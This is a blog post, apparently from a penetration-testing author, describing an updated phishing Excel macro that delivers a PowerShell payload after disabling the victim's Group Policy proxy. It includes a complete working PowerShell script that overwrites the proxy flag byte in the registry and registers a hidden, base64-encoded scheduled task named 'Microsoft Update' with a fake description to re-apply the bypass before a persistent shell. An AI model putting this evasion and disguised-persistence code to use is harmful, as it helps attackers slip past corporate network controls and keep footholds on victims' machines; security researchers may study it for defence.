New Feature added to Powershell Payload Excel Delivery

To start out, I have to give HUGE credit to @scriptmonkey_ for posting this amazing article. I'm sorry Microsoft didn't listen to you… hopefully this reinforces the point a little bit.

**This method is only useful when there is a second route out of the network, or the organization allows outbound connections that do not go through the proxy.**

I was lurking on Twitter yesterday when I ran into a retweet of this post. In a nutshell, it describes how you can disable proxy settings that are managed via Group Policy. I have heard (keep in mind, I'm 20 and have no pentest experience) that getting a shell out when there is a proxy in the way can be a little challenging. Because of this, I implemented the proxy bypass in both the macro and the persistence task. That way, whenever you want your shell, the proxy will be disabled. Here is how it works:

In most organizations you will see the same thing on every workstation: a proxy configured via Group Policy, with the connection settings in Internet Options locked so that the user cannot change them. This can be kind of a pain (so I have heard).

*If you want to recreate this, you can find instructions on how to disable changing Automatic Configuration Settings here.*

So first, let's create our document. I have updated the macro code, which now has two new functions. The first one (Proxy) disables the proxy for the initial shell, and the second one (ProxyKillTask) schedules a task that disables it again once the computer has been idle for 20 minutes. If the user reboots and the Group Policy proxy settings return, this task will disable them again before your persistent shell kicks off.

1. Create your document using the updated macro provided at https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroForProxies and send it.

2. Now let's set the scene on the victim side. This takes place under a non-privileged account, with proxy settings managed by Group Policy.

Once the document arrives in the user’s inbox, it will be opened. Once opened, here is what happens:

1. The first thing the macro does is disable the proxy. It does this before it executes the payload, to ensure there is no proxy standing between you and the target.

2. Once the proxy is disabled, it executes the payload.

3. Once the payload has executed, it schedules a task to persist on the machine (called "Windows Update"). This is nothing new, and you can read about it here if you wish to know more.

4. Right after that, it schedules another task and calls it "Microsoft Update".

What this task does is simple. It calls powershell.exe to edit the DefaultConnectionSettings value under HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections. This is a REG_BINARY value, and what you need to know is this:

The proxy mode is determined by the byte at offset 8 of the data (element [8] of the array once PowerShell reads the value in). That byte is a set of flags: 0x01 means a direct connection, 0x02 "Use a proxy server", 0x04 "Use automatic configuration script" and 0x08 "Automatically detect settings". If any proxy option is on, you will see a value other than 00 or 01. For example, the byte shows 09 (0x01 + 0x08) when "Automatically detect settings" is checked in the IE proxy settings.

If "Use automatic configuration script" is set instead (a .pac file or something similar), the 0x04 bit is set and the byte reads differently: 05 on its own, or 0D when auto-detect is also checked.

What the macro and the persistence task do is use PowerShell to read the contents of the value and replace the byte at offset 8 with 01 (01 is the value for "no proxy", i.e. a direct connection). The rest of the data, including the proxy server and script URL strings that follow the flags, is left untouched, so after the macro runs the byte simply reads 01.

As you can see, this completely disables the proxy on the machine for that user, allowing for a direct bypass of whatever that proxy was designed for. Keep in mind that it only changes the per-user WinINET setting: it does nothing about a firewall that blocks direct outbound traffic (hence the caveat at the top), and if Group Policy re-applies the setting, at reboot or on a policy refresh, the proxy is back until the task fires again.
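The following is an added example, not the macro from the original post or code from the Powershell-Payload-Excel-Delivery repository. It shows the two pieces described above in plain PowerShell: decoding and flipping the flag byte in DefaultConnectionSettings, and registering an idle-triggered scheduled task that re-applies the flip. Assumptions, labelled as such in the code: the flag byte sits at index 8 of the REG_BINARY value with bits 0x01 direct, 0x02 manual proxy, 0x04 auto-config script and 0x08 auto-detect; the task name ("Microsoft Update") and 20-minute idle time are the ones the post mentions; the task is registered through the Schedule.Service COM API rather than schtasks.exe, which sidesteps the command-line quoting and length limits of /TR.

```powershell
# Added example (not the post's macro). Everything runs under the current user's
# token and touches only HKCU, so no admin rights are required.
# Assumption: the flag byte is at index 8 of the REG_BINARY value, and its bits are
# 0x01 direct, 0x02 "Use a proxy server", 0x04 "Use automatic configuration script",
# 0x08 "Automatically detect settings".

$ConnPath  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections'
$ValueName = 'DefaultConnectionSettings'
$FlagIndex = 8   # assumption: the post's "8th place" is array element [8]

function Get-ProxyFlags {
    # Decode the flag byte so you can see why it reads 09, 05, 0D and so on.
    $data = [byte[]](Get-ItemProperty -Path $ConnPath -Name $ValueName).$ValueName
    if ($data.Length -le $FlagIndex) { throw "$ValueName is too short ($($data.Length) bytes)" }
    $f = [int]$data[$FlagIndex]
    [pscustomobject]@{
        Raw              = '0x{0:X2}' -f $f
        Direct           = [bool]($f -band 0x01)
        ManualProxy      = [bool]($f -band 0x02)   # "Use a proxy server"
        AutoConfigScript = [bool]($f -band 0x04)   # "Use automatic configuration script"
        AutoDetect       = [bool]($f -band 0x08)   # "Automatically detect settings"
    }
}

function Disable-Proxy {
    # Overwrite only the flag byte with 0x01 (direct). Every other byte, including
    # the proxy server and PAC URL strings that follow, is left in place.
    # Returns $true if the value was changed, $false if it was already direct.
    $data = [byte[]](Get-ItemProperty -Path $ConnPath -Name $ValueName).$ValueName
    if ($data[$FlagIndex] -eq 1) { return $false }
    $data[$FlagIndex] = 1
    Set-ItemProperty -Path $ConnPath -Name $ValueName -Value $data -Type Binary
    return $true
}

function Register-ProxyKillTask {
    # Idle-triggered task (the schtasks /SC ONIDLE equivalent) that re-runs the byte
    # flip, so a reboot or policy refresh that restores the GPO value is undone
    # before the persistent shell is due.
    param([string]$TaskName = 'Microsoft Update', [int]$IdleMinutes = 20)

    # One-liner the task runs; base64-encoded so the action needs no quoting at all.
    $oneLiner = "`$d=[byte[]](Get-ItemProperty '$ConnPath' '$ValueName').'$ValueName';" +
                "`$d[$FlagIndex]=1;Set-ItemProperty '$ConnPath' '$ValueName' `$d -Type Binary"
    $encoded  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($oneLiner))

    $svc = New-Object -ComObject 'Schedule.Service'
    $svc.Connect()
    $def = $svc.NewTask(0)
    $def.RegistrationInfo.Description = 'Checks for updates'     # cover story, as in the post
    $def.Settings.RunOnlyIfIdle              = $true
    $def.Settings.IdleSettings.IdleDuration  = "PT${IdleMinutes}M"
    $def.Settings.IdleSettings.WaitTimeout   = 'PT1H'
    $def.Settings.IdleSettings.StopOnIdleEnd = $false
    [void]$def.Triggers.Create(6)                                 # 6 = TASK_TRIGGER_IDLE
    $act = $def.Actions.Create(0)                                 # 0 = TASK_ACTION_EXEC
    $act.Path      = 'powershell.exe'
    $act.Arguments = "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded"
    # 6 = TASK_CREATE_OR_UPDATE, 3 = TASK_LOGON_INTERACTIVE_TOKEN (current user, no password)
    [void]$svc.GetFolder('\').RegisterTaskDefinition($TaskName, $def, 6, $null, $null, 3)
}

# Usage: inspect the flags, flip the byte, persist the flip, inspect again.
Get-ProxyFlags          # on a GPO auto-detect box this reports Raw 0x09, AutoDetect True
Disable-Proxy
Register-ProxyKillTask
Get-ProxyFlags          # now Raw 0x01, Direct True, everything else False
```

Running Get-ProxyFlags before and after is the quickest way to confirm you hit the right byte: on a machine configured the way the post describes it should go from 0x09 (or 0x05 / 0x0D with a configuration script) to 0x01. New processes read the value fresh, which is all the payload needs; an already-running browser may keep its old settings until restarted. Note that writing the value does not bump the counter in bytes 4 to 7 that Internet Options maintains, which is fine here because nothing in this flow relies on the UI noticing the change.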

I hope you find this useful! I also hope Microsoft gets their stuff together, as this is definitely a security flaw.

-Matt Nelson (@enigma0x3)
